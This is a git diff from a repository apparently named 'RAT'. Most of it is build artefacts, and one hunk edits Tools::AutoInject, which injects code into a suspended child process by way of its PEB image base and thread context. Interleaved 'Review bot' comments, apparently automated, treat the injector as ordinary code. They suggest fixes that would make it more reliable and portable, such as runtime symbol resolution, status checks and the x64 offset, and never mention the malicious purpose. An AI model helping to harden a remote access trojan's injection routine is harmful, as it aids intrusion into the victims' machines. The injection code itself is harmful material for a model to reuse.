diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
new file mode 100644
index 0000000..d30e36e
Binary files /dev/null and b/Debug/FunDLL.iobj differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
new file mode 100644
index 0000000..1e662ac
Binary files /dev/null and b/Debug/FunDLL.ipdb differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
new file mode 100644
index 0000000..7c917d7
Binary files /dev/null and b/Debug/FunDLL.pdb differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index 5f5e757..49dfc3a 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 5191b40..e219a04 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index 9b42e74..29b5d4d 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,5 +1,10 @@
 C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
 C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
+ fundll.cpp
+ tools.cpp
 Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
-tools.obj : error LNK2001: unresolved external symbol _NtQueryInformationProcess@20
-C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll : fatal error LNK1120: 1 unresolved externals
+ Generating code
+c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
+ All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ Finished generating code
+ Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
diff --git a/Dll/Debug/FunDLL.Build.CppClean.log b/Dll/Debug/FunDLL.Build.CppClean.log
index a1a62d7..0e53a99 100644
--- a/Dll/Debug/FunDLL.Build.CppClean.log
+++ b/Dll/Debug/FunDLL.Build.CppClean.log
@@ -1,4 +1,5 @@
 c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
+c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
 c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
 c:\users\hellisabove\source\repos\rat\debug\fundll.lib
 c:\users\hellisabove\source\repos\rat\debug\fundll.exp
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index 9059f15..34a3dbc 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog
index 4e617ff..6bbc5cf 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog
index bc1eb33..e7ddf59 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
new file mode 100644
index 0000000..b4bb458
Binary files /dev/null and b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog
index 46b134b..694b08a 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.command.1.tlog and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog
index 46b134b..bec3985 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.read.1.tlog and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog
index 46b134b..cfcbc5e 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.write.1.tlog and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/unsuccessfulbuild b/Dll/Debug/FunDLL.tlog/unsuccessfulbuild
deleted file mode 100644
index e69de29..0000000
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index 447dc9b..53ebfb9 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 4b50303..2ca1755 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -92,6 +92,7 @@ Windows true
+ C:\WinDDK\7600.16385.1\lib\wxp\i386\ntdll.lib;%(AdditionalDependencies)
diff --git a/Dll/tools.cpp b/Dll/tools.cpp
index c6ad22a..1792322 100644
--- a/Dll/tools.cpp
+++ b/Dll/tools.cpp
@@ -27,16 +27,16 @@ DWORD ConvertVirtualAddressToRawAddress(DWORD virtual_address, LPVOID file) {
 int Tools::AutoInject(LPSTR target, LPCSTR payload) {
 LPSTARTUPINFOA startup_info = new STARTUPINFOA();
- LPPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
- PROCESS_BASIC_INFORMATION *process_basic_info = new PROCESS_BASIC_INFORMATION();
+ LPPROCESS_INFORMATION process_information = new PROCESS_INFORMATION();
+ PROCESS_BASIC_INFORMATION *process_basic_information = new PROCESS_BASIC_INFORMATION();
- BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
+ BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_information);
 if (process_created == TRUE) {
- HANDLE target_process = process_info->hProcess;
+ HANDLE target_process = process_information->hProcess;
 if (target_process != INVALID_HANDLE_VALUE) {
 DWORD return_lenght = 0;
- NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_info, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
- DWORD image_base_offset = (DWORD)process_basic_info->PebBaseAddress + 8;
+ NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_information, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
+ DWORD image_base_offset = (DWORD)process_basic_information->PebBaseAddress + 8;
 LPVOID destination_image_base = 0;
 SIZE_T bytes_read = NULL;
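Review bot: The added AdditionalDependencies entry hard-codes `C:\WinDDK\7600.16385.1\lib\wxp\i386\ntdll.lib`, an absolute path into one developer's WDK 7600 install, so the link step that this commit repairs (the `LNK2001 _NtQueryInformationProcess@20` in the old Dll.log) will fail again on any machine or CI runner where that SDK is not at that exact location, and it silently pins the project to the 32-bit XP import library. The import library is avoidable altogether: resolve the symbol at runtime with `GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQueryInformationProcess")` and check the result for NULL, or, if a static import is preferred, reference the library through a property (for example `$(WinDDKDir)\lib\wxp\i386\ntdll.lib`) or rely on the `ntdll.lib` that I believe newer Windows SDKs ship in their um\ lib directory. Related build hygiene: the same commit checks in Debug\*.pdb, *.tlog and *.log files whose contents (visible in Dll.log above) embed the developer's `C:\Users\hellisabove\...` paths; those directories belong in .gitignore rather than in the repository.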
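Review bot: The NTSTATUS returned by the renamed `NtQueryInformationProcess(...)` call is discarded, so when the query fails `process_basic_information->PebBaseAddress` is still the value-initialised null and the code goes on to compute `image_base_offset` from it and read the child at that address; capture the status and bail out unless `NT_SUCCESS(status)` (or `status == 0` if ntstatus.h is not included) holds. The guard `if (target_process != INVALID_HANDLE_VALUE)` tests the wrong sentinel: inside the `process_created == TRUE` branch hProcess is always valid, and on failure CreateProcessA leaves the struct unfilled rather than setting INVALID_HANDLE_VALUE, so this check can never fire, while the calls whose results do matter (NtQueryInformationProcess and the memory read that presumably follows, given `destination_image_base` and `bytes_read`) go unchecked. The `+ 8` and the `(DWORD)` casts on PebBaseAddress are only correct for a 32-bit target, which matches the Win32/v141_xp toolset in this repo but deserves a comment such as `// PEB->ImageBaseAddress; x86 layout only, offset is 0x10 on x64`. AutoInject's body continues past the end of this hunk.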
@@ -122,7 +122,7 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) {
 LPCONTEXT context = new CONTEXT();
 context->ContextFlags = CONTEXT_INTEGER;
- GetThreadContext(process_info->hThread, context);
+ GetThreadContext(process_information->hThread, context);
 // machine code -> opcodes
 // code for exec DllMain when injected
@@ -146,8 +146,8 @@ int Tools::AutoInject(LPSTR target, LPCSTR payload) {
 if (success == TRUE) {
 context->Eax = (DWORD)address_buffer;
- SetThreadContext(process_info->hThread, context);
- ResumeThread(process_info->hThread);
+ SetThreadContext(process_information->hThread, context);
+ ResumeThread(process_information->hThread);
 }
 return 0;
 }
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index a761978..fd7f644 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index d67335b..7bf1f48 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index 6c5c365..444af5d 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index 4a1d873..f03f114 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index d45b5fc..0898a27 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ
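Review bot: The `return 0;` in this hunk is the only return visible in AutoInject, and the Dll.log committed alongside reports `tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value`, which places the function's closing brace after this hunk and means at least one path (presumably the one where CreateProcessA fails) flows off the end of a non-void function, undefined behaviour that hands the caller an indeterminate result. Add an explicit failure return on that path, for example `return -1;` after the `if (process_created == TRUE)` block, and consider returning a distinct value from the `success == TRUE` branch so callers can tell a completed injection from a skipped one instead of always seeing 0. Nothing visible in the diff ever releases the `new`-allocated STARTUPINFOA, PROCESS_INFORMATION, PROCESS_BASIC_INFORMATION and CONTEXT objects or closes `hProcess`/`hThread`, and when `success` is FALSE the child is left suspended forever; on the failure path call `TerminateProcess(process_information->hProcess, 1)` and on every path `CloseHandle` both handles, or hold them in RAII wrappers. AutoInject starts before this hunk and, per the warning's line number, ends after it.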